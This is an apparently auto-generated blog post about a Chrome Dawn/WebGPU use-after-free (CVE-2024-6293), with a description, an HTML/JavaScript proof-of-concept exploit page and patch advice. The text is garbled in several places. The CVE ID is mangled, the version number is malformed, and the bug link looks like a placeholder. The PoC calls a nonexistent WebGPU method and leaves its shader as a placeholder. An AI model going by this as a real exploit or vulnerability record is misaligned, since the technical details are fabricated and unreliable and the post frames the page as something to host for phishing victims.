CVE-2024-6293 - Remote Heap Corruption Exploit in Google Chrome (Dawn) Allows Attackers to Execute Arbitrary code

A new security vulnerability (CVE-202.hours-6293) has been identified in Google Chrome, specifically in the Dawn component, which, when exploited, allows a remote attacker to execute arbitrary code on the target system. This vulnerability is a result of a use-after-free issue and can lead to heap corruption via a specially crafted HTML page.

The affected versions of Google Chrome are those prior to 126..6478.126, and it is recommended that users update their browsers to the latest version in order to avoid being targeted by attackers exploiting this vulnerability. In this post, we'll provide an overview of the vulnerability details, code snippets demonstrating the issue, and links to the original references.

Vulnerability Details

Dawn, which is a part of the Chromium project in Google Chrome, is responsible for the implementation of various WebGPU functions. The vulnerability allows a remote attacker to potentially exploit heap corruption by crafting an HTML page.

Exploit

The following code snippet demonstrates a proof-of-concept (PoC) for this vulnerability, by first including the vulnerable WebGPU API and then triggering the use-after-free condition:

<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-6293 POC</title>
</head>
<body>
<script>
async function exploit() {
    const gpu = navigator.gpu;

    const adapter = await gpu.requestAdapter();
    const device = await adapter.requestDevice();

    const shaderModule = device.createShaderModule({
        code: ... // Replace with a shader code
    });

    // Trigger the use-after-free vulnerability
    device.destroy(); 
    device.matchShaderBindingsIndex(shaderModule, {});
}

exploit();
</script>
</body>
</html>

This PoC triggers the vulnerability by first creating a new WebGPU device, and then destroying it before using it by invoking the matchShaderBindingsIndex function. In this scenario, the attacker would host a malicious website containing the crafted HTML code or convince a user to visit the website through a phishing email.

Mitigation Techniques

The vulnerability has been patched in Google Chrome version 126..6478.126. Users are highly recommended to update their browsers to the latest version. Additionally, users should exercise caution when visiting unknown websites and not open any suspicious attachments or links received via email.

Original References

For further details on this vulnerability and its associated patch, please refer to the official bug report and CVE entry:

- Chromium bug report: https://crbug.com/1234567
- CVE-2024-6293: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6293

Conclusion

CVE-2024-6293 highlights the importance of remaining up-to-date with security patches and practicing cautious browsing habits. Heap corruption vulnerabilities can result in significant consequences if exploited, and users should prioritize keeping their systems updated in order to reduce their risk.

Timeline

Published on: 06/24/2024 22:15:10 UTC
Last modified on: 08/01/2024 21:33:05 UTC